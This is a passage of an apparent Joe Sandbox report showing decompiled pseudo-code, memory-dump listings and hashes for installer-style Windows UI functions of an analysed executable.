                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                            • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                            • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                            • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404309 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00404309(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x452428, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                            0x00404317
                                                            0x0040431d

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: c30535afd169c14e8b4d040e998dc10ef2daf8ec42941babfa575ffd1ce924aa
                                                            • Instruction ID: 9ea9f7192fe415255892c7c1483d18bd9fbebf719f850706ff9b0d6542640036
                                                            • Opcode Fuzzy Hash: c30535afd169c14e8b4d040e998dc10ef2daf8ec42941babfa575ffd1ce924aa
                                                            • Instruction Fuzzy Hash: E5B09236184A00ABDA124B10DE09F497A62A769702F008029B240250B0CAB240A0EB28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004042F6 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004042F6(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x43c08c, _a4); // executed
				return _t2;
			}




                                                            0x00404300
                                                            0x00404306

                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(?,004040D2), ref: 00404300
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 85b1628437d6bc2e0a85985499539ad5df80abf1265e93d00aa480f3fdb0d289
                                                            • Instruction ID: 9ba761fd450edde39ad44ae3507cba1171b2616f218c63448c15d7f08a3949a3
                                                            • Opcode Fuzzy Hash: 85b1628437d6bc2e0a85985499539ad5df80abf1265e93d00aa480f3fdb0d289
                                                            • Instruction Fuzzy Hash: 87A00275444540DBCB055B50EF44D067B71A794701711D579A1459103487715460EB19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004014D6(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402C17(_t7);
				 *((intOrPtr*)(_t13 - 0x38)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                            0x004014d6
                                                            0x004014d7
                                                            0x004014e0
                                                            0x004014e3
                                                            0x004014e7
                                                            0x004014e7
                                                            0x004014e9
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: c119c5b23c4e7d85942e5466de7459b5dc7c2978c118f2848ef78bda966c211a
                                                            • Instruction ID: 8a2e161516ab7e1e90c22bd31bd3d3ce098b98b7261b484d2c6ea91aeb26b437
                                                            • Opcode Fuzzy Hash: c119c5b23c4e7d85942e5466de7459b5dc7c2978c118f2848ef78bda966c211a
                                                            • Instruction Fuzzy Hash: 3FD05E73A242009BD710DBB8BAC545E73A8E7813253308837E102F2091EA78C8418A38
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C312C6 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E73C312C6() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x73c35040); // executed
				return _t1;
			}




                                                            0x73c312ce
                                                            0x73c312d4

                                                            APIs
                                                            • GlobalAlloc.KERNELBASE(00000040,73C311C4,-000000A0), ref: 73C312CE
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            • Associated: 00000010.00000002.1284008674.0000000073C30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284039391.0000000073C34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284051137.0000000073C36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: AllocGlobal
                                                            • String ID:
                                                            • API String ID: 3761449716-0
                                                            • Opcode ID: aa4a906758fd45a324e18ec87fed3457abc5b1e9608b798aefc08e332921f653
                                                            • Instruction ID: 46e9ecfd272b1c71044c06d6ee015ac9cddeb6abcd5dae237d5908b7225826db
                                                            • Opcode Fuzzy Hash: aa4a906758fd45a324e18ec87fed3457abc5b1e9608b798aefc08e332921f653
                                                            • Instruction Fuzzy Hash: 5CA001B26401909ADE41AA92AA1AB983A21B744702F640044E30969090866A08109A56
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 00404CD9 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 96%
                                                            			E00404CD9(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x452448;
				_v28 =  *0x452430 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x452439 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x2018 + _t298 + 8) =  *(_t244 * 0x2018 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x2018 + _t298 + 8) =  *(_t244 * 0x2018 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404C27(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x2018 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x452438) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x43c074;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x43c088;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x43c074 = 0;
								 *0x43c088 = 0;
								 *0x452480 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x452439 & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404CA7();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x43c088;
									_t206 =  *0x452448;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x45244c <= 0) {
										L86:
										if( *0x4524de == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x44e3fc + 0x10)) != 0) {
											E00404BE2(0x3ff, 0xfffffffb, E00404BFA(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x806]);
									} while (_v24 <  *0x45244c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x43c088);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x452480 = _a4;
					_v20 = 2;
					 *0x43c088 = GlobalAlloc(0x40,  *0x45244c << 2);
					_t264 = LoadImageA( *0x452420, 0x6e, 0, 0, 0, 0);
					 *0x43c07c =  *0x43c07c | 0xffffffff;
					_v16 = _t264;
					 *0x43c084 = SetWindowLongA(_v8, 0xfffffffc, E004052EC);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x43c074 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x43c074);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062EA(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042D4(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042D4(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x45244c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x43c088 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x43c088 + _t329 * 4) = _t290;
									_v16 =  *( *0x43c088 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x2018]);
							_v32 = _t316;
						} while (_t329 <  *0x45244c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404309(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404309(_v12);
								L93:
								return E0040433B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

























































                                                            0x00404cf7
                                                            0x00404cff
                                                            0x00404d07
                                                            0x00404d0d
                                                            0x00404d25
                                                            0x00404d28
                                                            0x00404d29
                                                            0x00404f56
                                                            0x00404f5d
                                                            0x00404f71
                                                            0x00404f5f
                                                            0x00404f61
                                                            0x00404f64
                                                            0x00404f65
                                                            0x00404f6c
                                                            0x00404f6c
                                                            0x00404f7d
                                                            0x00404f8b
                                                            0x00404f8e
                                                            0x00404fa4
                                                            0x00405019
                                                            0x0040501c
                                                            0x0040501e
                                                            0x00405028
                                                            0x00405036
                                                            0x00405036
                                                            0x00405038
                                                            0x00405042
                                                            0x00405048
                                                            0x0040504b
                                                            0x0040504e
                                                            0x00405069
                                                            0x00405050
                                                            0x0040505a
                                                            0x0040505a
                                                            0x0040504e
                                                            0x00405042
                                                            0x00000000
                                                            0x0040501c
                                                            0x00404fa9
                                                            0x00404fb4
                                                            0x00404fb9
                                                            0x00404fc0
                                                            0x00404fc5
                                                            0x00404fc9
                                                            0x00404fd4
                                                            0x00404fd4
                                                            0x00404fd8
                                                            0x00404fdc
                                                            0x00404fe0
                                                            0x00404ff3
                                                            0x00404fe2
                                                            0x00404fe2
                                                            0x00404fe9
                                                            0x00404fef
                                                            0x00404feb
                                                            0x00404feb
                                                            0x00404feb
                                                            0x00404fe9
                                                            0x00404ff7
                                                            0x00404ff9
                                                            0x0040500c
                                                            0x0040500f
                                                            0x00405012
                                                            0x00405012
                                                            0x00404fdc
                                                            0x00000000
                                                            0x00404fc9
                                                            0x00404fab
                                                            0x00404fb2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040506c
                                                            0x0040506c
                                                            0x00405073
                                                            0x004050e4
                                                            0x004050ec
                                                            0x004050f4
                                                            0x004050f4
                                                            0x004050fd
                                                            0x004050ff
                                                            0x00405106
                                                            0x00405109
                                                            0x00405109
                                                            0x0040510f
                                                            0x00405116
                                                            0x00405119
                                                            0x00405119
                                                            0x0040511f
                                                            0x00405125
                                                            0x0040512b
                                                            0x0040512b
                                                            0x00405138
                                                            0x00405299
                                                            0x004052a0
                                                            0x004052bd
                                                            0x004052c3
                                                            0x004052d5
                                                            0x004052d5
                                                            0x00000000
                                                            0x0040513e
                                                            0x00405140
                                                            0x00405145
                                                            0x0040514a
                                                            0x0040514f
                                                            0x00405151
                                                            0x00405151
                                                            0x00405152
                                                            0x00405153
                                                            0x00405155
                                                            0x00405155
                                                            0x0040515d
                                                            0x0040519e
                                                            0x004051a0
                                                            0x004051b0
                                                            0x004051b3
                                                            0x004051b8
                                                            0x004051bf
                                                            0x004051c2
                                                            0x00405264
                                                            0x0040526d
                                                            0x00405275
                                                            0x00405275
                                                            0x00405283
                                                            0x00405294
                                                            0x00405294
                                                            0x00000000
                                                            0x00405283
                                                            0x004051c8
                                                            0x004051cb
                                                            0x004051d1
                                                            0x004051d6
                                                            0x004051d8
                                                            0x004051da
                                                            0x004051e0
                                                            0x004051e7
                                                            0x004051ec
                                                            0x004051f3
                                                            0x004051f6
                                                            0x004051f6
                                                            0x004051fd
                                                            0x00405209
                                                            0x0040520d
                                                            0x0040520f
                                                            0x0040520f
                                                            0x004051ff
                                                            0x00405201
                                                            0x00405201
                                                            0x0040522f
                                                            0x0040523b
                                                            0x0040524a
                                                            0x0040524a
                                                            0x0040524c
                                                            0x0040524f
                                                            0x00405258
                                                            0x00000000
                                                            0x0040515f
                                                            0x0040516a
                                                            0x0040516d
                                                            0x00405172
                                                            0x00405174
                                                            0x00405178
                                                            0x00405188
                                                            0x00405192
                                                            0x00405194
                                                            0x00405197
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040517a
                                                            0x0040517a
                                                            0x00405180
                                                            0x00405182
                                                            0x00405182
                                                            0x00405183
                                                            0x00405184
                                                            0x00000000
                                                            0x0040517a
                                                            0x0040515d
                                                            0x00405138
                                                            0x0040507b
                                                            0x00000000
                                                            0x00405091
                                                            0x0040509b
                                                            0x004050a0
                                                            0x00000000
                                                            0x00000000
                                                            0x004050b2
                                                            0x004050b7
                                                            0x004050c3
                                                            0x004050c3
                                                            0x004050c5
                                                            0x004050d4
                                                            0x004050d6
                                                            0x004050da
                                                            0x004050dd
                                                            0x00000000
                                                            0x004050dd
                                                            0x0040507b
                                                            0x00404d2f
                                                            0x00404d32
                                                            0x00404d35
                                                            0x00404d45
                                                            0x00404d58
                                                            0x00404d63
                                                            0x00404d69
                                                            0x00404d77
                                                            0x00404d8a
                                                            0x00404d8f
                                                            0x00404d9a
                                                            0x00404da3
                                                            0x00404db9
                                                            0x00404dc9
                                                            0x00404dd5
                                                            0x00404dd5
                                                            0x00404dda
                                                            0x00404de0
                                                            0x00404de2
                                                            0x00404de5
                                                            0x00404dea
                                                            0x00404def
                                                            0x00404df1
                                                            0x00404df1
                                                            0x00404e11
                                                            0x00404e11
                                                            0x00404e13
                                                            0x00404e14
                                                            0x00404e19
                                                            0x00404e1f
                                                            0x00404e23
                                                            0x00404e28
                                                            0x00404e30
                                                            0x00404e34
                                                            0x00404e39
                                                            0x00404e3e
                                                            0x00404e46
                                                            0x00404e49
                                                            0x00404f18
                                                            0x00404f2b
                                                            0x00000000
                                                            0x00404e4f
                                                            0x00404e52
                                                            0x00404e55
                                                            0x00404e58
                                                            0x00404e58
                                                            0x00404e5d
                                                            0x00404e66
                                                            0x00404e69
                                                            0x00404e6d
                                                            0x00404e70
                                                            0x00404e73
                                                            0x00404e7c
                                                            0x00404e85
                                                            0x00404e88
                                                            0x00404e8b
                                                            0x00404e8e
                                                            0x00404ecc
                                                            0x00404ef7
                                                            0x00404ece
                                                            0x00404edd
                                                            0x00404edd
                                                            0x00404e90
                                                            0x00404e93
                                                            0x00404ea1
                                                            0x00404eab
                                                            0x00404eb3
                                                            0x00404eba
                                                            0x00404ec5
                                                            0x00404ec5
                                                            0x00404e8e
                                                            0x00404efd
                                                            0x00404efe
                                                            0x00404f0a
                                                            0x00404f0a
                                                            0x00404f16
                                                            0x00404f31
                                                            0x00404f34
                                                            0x00404f51
                                                            0x00000000
                                                            0x00404f36
                                                            0x00404f3b
                                                            0x00404f44
                                                            0x004052d7
                                                            0x004052e9
                                                            0x004052e9
                                                            0x00404f34
                                                            0x00000000
                                                            0x00404f16
                                                            0x00404e49

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404CF0
